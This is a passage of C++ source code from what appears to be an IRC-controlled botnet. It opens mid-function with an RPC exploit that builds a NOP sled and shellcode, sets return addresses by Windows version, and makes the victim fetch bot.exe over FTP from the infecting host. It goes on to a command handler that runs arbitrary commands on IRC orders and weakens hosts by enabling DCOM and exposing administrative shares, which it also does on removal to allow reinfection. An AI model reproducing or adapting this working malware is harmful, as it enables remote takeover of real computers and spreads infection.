sURL.Format("ftp://*****:*****@%s:%d/bot.exe", inet_ntoa(to_in_addr(g_pMainCtrl->m_cIRC.m_lLocalAddr)), \
g_pMainCtrl->m_cBot.bot_ftrans_port_ftp.iValue);
iShellSize=setup_shellcode_udtf(szShellBuf, sizeof(szShellBuf), sURL.Str(), false);
// Build a buffer with the shellcode
memcpy(szSCBuf+iPos, shellcode_start, sizeof(shellcode_start)-1 ); iPos+=sizeof(shellcode_start)-1;
memset(szSCBuf+iPos, '\x90', iNOPSize ); iPos+=iNOPSize;
memcpy(szSCBuf+iPos, szShellBuf, iShellSize ); iPos+=iShellSize;
iSCSize=iPos; iPos=0;
// Prepend NOPs as long as shellcode doesn't fit RPC packet format
while(iSCSize%16!=12)
{ char *szTemp=(char*)malloc(iSCSize+1); iNOPSize++;
memcpy(szSCBuf+iPos, shellcode_start, sizeof(shellcode_start)-1 ); iPos+=sizeof(shellcode_start)-1;
memset(szSCBuf+iPos, '\x90', iNOPSize ); iPos+=iNOPSize;
memcpy(szSCBuf+iPos, szShellBuf, iShellSize ); iPos+=iShellSize;
iSCSize=iPos; iPos=0; free(szTemp); }
// Set the return address
if(iHostOS==OS_WINXP || iHostOS==OS_UNKNOWN)
memcpy(szSCBuf+36, (char*)&my_offsets[1], 4);
else
memcpy(szSCBuf+36, (char*)&my_offsets[0], 4);
// Build the request
memcpy(szReqBuf+iPos, request1, sizeof(request1)-1 ); iPos+=sizeof(request1)-1;
memcpy(szReqBuf+iPos, request2, sizeof(request2)-1 ); iPos+=sizeof(request2)-1;
memcpy(szReqBuf+iPos, szSCBuf, iSCSize ); iPos+=iSCSize;
memcpy(szReqBuf+iPos, request3, sizeof(request3)-1 ); iPos+=sizeof(request3)-1;
memcpy(szReqBuf+iPos, request4, sizeof(request4)-1 ); iPos+=sizeof(request4)-1;
iReqSize=iPos;
pTemp=szReqBuf+sizeof(request1)-1; // Fill the request with the right sizes
*(unsigned long*)(pTemp) = *(unsigned long*)(pTemp) + iSCSize / 2;
*(unsigned long*)(pTemp+8) = *(unsigned long*)(pTemp+8) + iSCSize / 2; pTemp=szReqBuf;
*(unsigned long*)(pTemp+8) = *(unsigned long*)(pTemp+8) + iSCSize - 12;
*(unsigned long*)(pTemp+16) = *(unsigned long*)(pTemp+16) + iSCSize - 12;
*(unsigned long*)(pTemp+128) = *(unsigned long*)(pTemp+128) + iSCSize - 12;
*(unsigned long*)(pTemp+132) = *(unsigned long*)(pTemp+132) + iSCSize - 12;
*(unsigned long*)(pTemp+180) = *(unsigned long*)(pTemp+180) + iSCSize - 12;
*(unsigned long*)(pTemp+184) = *(unsigned long*)(pTemp+184) + iSCSize - 12;
*(unsigned long*)(pTemp+208) = *(unsigned long*)(pTemp+208) + iSCSize - 12;
*(unsigned long*)(pTemp+396) = *(unsigned long*)(pTemp+396) + iSCSize - 12;
unsigned long lWritten; char *szInBuf=(char*)malloc(100000); memset(szInBuf, 0, 100000);
// Send the bind string
DWORD dwRead; TransactNamedPipe(hFile, bindstr, sizeof(bindstr)-1, szInBuf, 10000, &dwRead, NULL);
if(szInBuf[2]!=0x0C) { CloseHandle(hFile); CloseNullSession(m_sSocket.m_szHost); return bRetVal; }
// Send the evil request
if(!WriteFile(hFile, szReqBuf, iReqSize, &lWritten, 0)) { CloseHandle(hFile); CloseNullSession(m_sSocket.m_szHost); return bRetVal; }
if(!ReadFile(hFile, szInBuf, 10000, &dwRead, NULL)) bRetVal=true; else bRetVal=false;
free(szInBuf); }
CloseHandle(hFile);
CloseNullSession(m_sSocket.m_szHost); }
return bRetVal;
#endif // _WIN32
}
break;
default:
return false;
break;
}
return false;
}
bool CBot::HandleCommand(CMessage *pMsg)
{
if(!pMsg->sCmd.Compare("bot.remove") || !pMsg->sCmd.Compare("bot.removeallbut")) {
CString sId(pMsg->sChatString.Token(1, " ", true));
if(!pMsg->sCmd.Compare("bot.removeallbut")) if(!sId.Compare(g_pMainCtrl->m_cBot.bot_id.sValue)) return false;
g_pMainCtrl->m_cIRC.SendMsg(pMsg->bSilent, pMsg->bNotice, "removing bot...", pMsg->sReplyTo);
#ifdef WIN32
/// should unsecure system as remove bot to allow recycling //
// Set EnableDCOM to "Y"
HKEY hkey=NULL; DWORD dwSize=128; char szDataBuf[128];
strcpy(szDataBuf, "Y"); dwSize=strlen(szDataBuf);
LONG lRet=RegOpenKeyEx(HKEY_LOCAL_MACHINE, "Software\\Microsoft\\OLE", 0, KEY_READ, &hkey);
RegSetValueEx(hkey, "EnableDCOM", NULL, REG_SZ, (unsigned char*)szDataBuf, dwSize);
RegCloseKey(hkey);
// UnSecure Shares
Execute("net.exe", "net share c$=c:\\");
Execute("net.exe", "net share d$=d:\\");
Execute("net.exe", "net share e$=e:\\");
Execute("net.exe", "net share ipc$");
Execute("net.exe", "net share admin$");
// Delete Autostart
if(g_pMainCtrl->m_cBot.as_enabled.bValue)
g_pMainCtrl->m_cInstaller.RegStartDel(g_pMainCtrl->m_cBot.as_valname.sValue);
if(g_pMainCtrl->m_cBot.as_service.bValue)
g_pMainCtrl->m_cInstaller.ServiceDel(g_pMainCtrl->m_cBot.as_service_name.sValue);
#endif
g_pMainCtrl->m_cInstaller.Uninstall();
g_pMainCtrl->m_cIRC.m_bRunning=false; g_pMainCtrl->m_bRunning=false; }
else if(!pMsg->sCmd.Compare("bot.execute")) {
CString sText(pMsg->sChatString.Token(2, " ", true)); bool bVisible=atoi(pMsg->sChatString.Token(1, " ").CStr())==1;
#ifdef WIN32
CString sTextExp; ExpandEnvironmentStrings(sText.CStr(), sTextExp.GetBuffer(8192), 8192); // interpret environment variables
sText.Assign(sTextExp); PROCESS_INFORMATION pinfo; STARTUPINFO sinfo;
memset(&sinfo, 0, sizeof(STARTUPINFO)); sinfo.cb=sizeof(sinfo);
if(bVisible) sinfo.wShowWindow=SW_SHOW; else sinfo.wShowWindow=SW_HIDE;
if(!CreateProcess(NULL, sText.Str(), NULL, NULL, TRUE, NORMAL_PRIORITY_CLASS | DETACHED_PROCESS, NULL, NULL, &sinfo, &pinfo)) {
g_pMainCtrl->m_cIRC.SendMsg(pMsg->bSilent, pMsg->bNotice, "couldn't execute file.", pMsg->sReplyTo.Str()); return false; }
#else
CString sCmdBuf; sCmdBuf.Format("/bin/sh -c \"%s\"", sText.CStr());
if(system(sCmdBuf.CStr())==-1) { g_pMainCtrl->m_cIRC.SendMsg(pMsg->bSilent, pMsg->bNotice, "couldn't execute file.", pMsg->sReplyTo.Str()); return false; }
#endif
return true; }
else if(!pMsg->sCmd.Compare("bot.open")) {
if(!(pMsg->sChatString.GetLength() > (pMsg->sCmd.GetLength()+pMsg->sChatString.Token(1, " ").GetLength()+3))) return false;
CString sText; sText.Assign(&pMsg->sChatString[pMsg->sCmd.GetLength()+2]); bool bRet=false;
#ifdef WIN32
bRet=(int)ShellExecute(0, "open", sText.CStr(), NULL, NULL, SW_SHOW)>=32;
#else
bRet=system(sText.CStr())>0;
#endif
if(bRet) return g_pMainCtrl->m_cIRC.SendMsg(pMsg->bSilent, pMsg->bNotice, "file opened.", pMsg->sReplyTo.Str());
else return g_pMainCtrl->m_cIRC.SendMsg(pMsg->bSilent, pMsg->bNotice, "couldn't open file.", pMsg->sReplyTo.Str()); }
else if(!pMsg->sCmd.Compare("bot.dns")) {
CString sReply; hostent *pHostent=NULL; in_addr iaddr;
if(!pMsg->sChatString.Token(1, " ").Compare("")) return false;
unsigned long addr=inet_addr(pMsg->sChatString.Token(1, " ").CStr());
if(addr!=INADDR_NONE) {
pHostent=gethostbyaddr((char*)&addr, sizeof(struct in_addr), AF_INET);
if(pHostent) {
sReply.Format("%s -> %s", pMsg->sChatString.Token(1, " ").CStr(), pHostent->h_name);
return g_pMainCtrl->m_cIRC.SendMsg(pMsg->bSilent, pMsg->bNotice, sReply.Str(), pMsg->sReplyTo.Str()); }
} else {
pHostent=gethostbyname(pMsg->sChatString.Token(1, " ").CStr());
if(pHostent) {
iaddr=*((in_addr*)*pHostent->h_addr_list);
sReply.Format("%s -> %s", pMsg->sChatString.Token(1, " ").CStr(), inet_ntoa(iaddr));
return g_pMainCtrl->m_cIRC.SendMsg(pMsg->bSilent, pMsg->bNotice, sReply.Str(), pMsg->sReplyTo.Str()); } }
if(!pHostent) {
sReply.Format("couldn't resolve host \"%s\"!", pMsg->sChatString.Token(1, " ").CStr());
return g_pMainCtrl->m_cIRC.SendMsg(pMsg->bSilent, pMsg->bNotice, sReply.Str(), pMsg->sReplyTo.Str()); } }
else if(!pMsg->sCmd.Compare("bot.about")) {
CString sReplyBuf; sReplyBuf.Format("%s", g_pMainCtrl->m_sNameVerStr.CStr());
return g_pMainCtrl->m_cIRC.SendMsg(pMsg->bSilent, pMsg->bNotice, sReplyBuf.Str(), pMsg->sReplyTo.Str()); }
else if(!pMsg->sCmd.Compare("bot.id")) {
return g_pMainCtrl->m_cIRC.SendMsg(pMsg->bSilent, pMsg->bNotice, bot_id.sValue.Str(), pMsg->sReplyTo.Str()); }
else if(!pMsg->sCmd.Compare("bot.nick")) {
g_pMainCtrl->m_sUserName.Format("%s", pMsg->sChatString.Token(1, " ", true).Mid(0, 32).CStr());
g_pMainCtrl->m_cIRC.SendRawFormat("NICK %s\r\n", g_pMainCtrl->m_sUserName.CStr());
return true; }
else if(!pMsg->sCmd.Compare("bot.quit") || !pMsg->sCmd.Compare("bot.die")) {
g_pMainCtrl->m_cIRC.m_bRunning=false; return true; }
else if(!pMsg->sCmd.Compare("bot.sysinfo")) {
return g_pMainCtrl->m_cIRC.SendMsg(pMsg->bSilent, pMsg->bNotice, SysInfo().Str(), pMsg->sReplyTo.Str()); }
else if(!pMsg->sCmd.Compare("bot.longuptime")) {
int iDays=atoi(pMsg->sChatString.Token(1, " ").CStr()); if(!iDays) iDays=7;
CString sUptime=LongUptime(iDays);
if(sUptime.Compare("")) {
g_pMainCtrl->m_cIRC.SendMsg(pMsg->bSilent, pMsg->bNotice, \
sUptime.Str(), pMsg->sReplyTo.Str()); }
return true; }
else if(!pMsg->sCmd.Compare("bot.status")) {
return g_pMainCtrl->m_cIRC.SendMsg(pMsg->bSilent, pMsg->bNotice, Status().Str(), pMsg->sReplyTo.Str()); }
else if(!pMsg->sCmd.Compare("bot.rndnick")) {
CString sRndNick=RndNick(si_nickprefix.sValue.CStr());
g_pMainCtrl->m_cIRC.SendRawFormat("NICK %s\r\n", sRndNick.CStr());
g_pMainCtrl->m_sUserName.Format("%s", sRndNick.Mid(0, 32).CStr());
return true; }
else if(!pMsg->sCmd.Compare("bot.flushdns")) {
#ifdef WIN32
Execute("ipconfig.exe", "/flushdns");
#else
Execute("nscd", "-i hosts");
#endif // WIN32
return true; }
else if(!pMsg->sCmd.Compare("bot.secure")) {
#ifdef WIN32
// Set EnableDCOM to "N"
HKEY hkey=NULL; DWORD dwSize=128; char szDataBuf[128];
strcpy(szDataBuf, "N"); dwSize=strlen(szDataBuf);
LONG lRet=RegOpenKeyEx(HKEY_LOCAL_MACHINE, "Software\\Microsoft\\OLE", 0, KEY_READ, &hkey);
RegSetValueEx(hkey, "EnableDCOM", NULL, REG_SZ, (unsigned char*)szDataBuf, dwSize);
RegCloseKey(hkey);
// Secure Shares
system("net share c$ /delete /y");
system("net share d$ /delete /y");
system("net share ipc$ /delete /y");
system("net share admin$ /delete /y");
g_pMainCtrl->m_cIRC.SendMsg(pMsg->bSilent, pMsg->bNotice, \
"Bot Secured", pMsg->sReplyTo.Str());
#endif
return true; }
else if(!pMsg->sCmd.Compare("bot.unsecure")) {
#ifdef WIN32
// Set EnableDCOM to "Y"
HKEY hkey=NULL; DWORD dwSize=128; char szDataBuf[128];
strcpy(szDataBuf, "Y"); dwSize=strlen(szDataBuf);
LONG lRet=RegOpenKeyEx(HKEY_LOCAL_MACHINE, "Software\\Microsoft\\OLE", 0, KEY_READ, &hkey);
RegSetValueEx(hkey, "EnableDCOM", NULL, REG_SZ, (unsigned char*)szDataBuf, dwSize);
RegCloseKey(hkey);
// UnSecure Shares
system("net share c$=c:\\");
system("net share d$=d:\\");
system("net share e$=e:\\");
system("net share ipc$");
system("net share admin$");
g_pMainCtrl->m_cIRC.SendMsg(pMsg->bSilent, pMsg->bNotice, \
"Bot UnSecured", pMsg->sReplyTo.Str());
#endif
return true; }
else if(!pMsg->sCmd.Compare("bot.command")) {
#ifdef WIN32
if(!(pMsg->sChatString.GetLength() > (pMsg->sCmd.GetLength()+pMsg->sChatString.Token(1, " ").GetLength()+3))) return false;
CString sText; sText.Assign(&pMsg->sChatString[pMsg->sCmd.GetLength()+2]); bool bRet=false;
CString sReplyBuf; sReplyBuf.Format("command (%s) executed.", sText.CStr());
if(system(sText.CStr())==-1) { g_pMainCtrl->m_cIRC.SendMsg(pMsg->bSilent, pMsg->bNotice, "couldn't execute command.", pMsg->sReplyTo.Str()); return false; }
else { g_pMainCtrl->m_cIRC.SendMsg(pMsg->bSilent, pMsg->bNotice, sReplyBuf.Str(), pMsg->sReplyTo.Str()); return false; }
#endif
return true; }
return false; }
int CString::Compare(const CString& str, const size_t pos, const size_t len) const {
return Compare(str.Str(), pos, len);
}
int CString::Compare(const CString& str) const {
return Compare(str.Str(), str.Length());
}
size_t CString::Pos(const CString& str, const size_t pos) const {
return Pos(str.Str(), pos);
}
size_t CString::Pos(const CString& str) const{
return Pos(str.Str());
}
